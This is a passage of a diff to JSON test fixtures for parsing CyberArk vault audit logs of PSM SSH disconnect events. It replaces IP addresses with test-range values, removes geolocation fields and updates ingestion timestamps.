\u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" 
Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -778,21 +724,21 @@ "psmid": "PSMServer", "session_id": "988b22e8-82a7-11eb-83b9-080027efd402", "src_host": "10.0.2.2", - "dst_host": "34.123.103.115", + "dst_host": "67.43.156.15", "session_duration": "00:00:12" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "PSM Disconnect", "timestamp": "Mar 11 12:23:30", "desc": "PSM Disconnect" 
@@ -804,8 +750,8 @@ "event": { "severity": 2, "duration": 12000000000, - "ingested": "2021-06-09T10:24:31.624809500Z", - "original": "\u003c5\u003e1 2021-03-11T20:23:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:23:30\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:23:30Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:23:30\",\"IsoTimestamp\":\"2021-03-11T20:23:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813801300Z", + "original": "\u003c5\u003e1 2021-03-11T20:23:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:23:30\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:23:30Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n 
\u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
12:23:30\",\"IsoTimestamp\":\"2021-03-11T20:23:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", @@ -828,39 +774,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" 
@@ -877,7 +802,7 @@ }, "@timestamp": "2021-03-14T13:49:54.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
@@ -888,16 +813,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-14T13:49:54Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:54\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:54Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" 
Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:54\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:54Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n 
\u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { 
@@ -909,14 +833,14 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "d284c268-2ba0-4366-af52-e33459b073a1", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "session_duration": "00:00:18" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -928,9 +852,9 @@ "reset_immediately": "ReconcileTask", "last_task": "ReconcileTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Disconnect", "timestamp": "Mar 14 06:49:54", "desc": "PSM Disconnect" 
@@ -942,8 +866,8 @@ "event": { "severity": 2, "duration": 18000000000, - "ingested": "2021-06-09T10:24:31.624812Z", - "original": "\u003c5\u003e1 2021-03-14T13:49:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:54\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:54Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:54\",\"IsoTimestamp\":\"2021-03-14T13:49:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM 
Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813806700Z", + "original": "\u003c5\u003e1 2021-03-14T13:49:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:54\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:54Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n 
\u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:54\",\"IsoTimestamp\":\"2021-03-14T13:49:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or 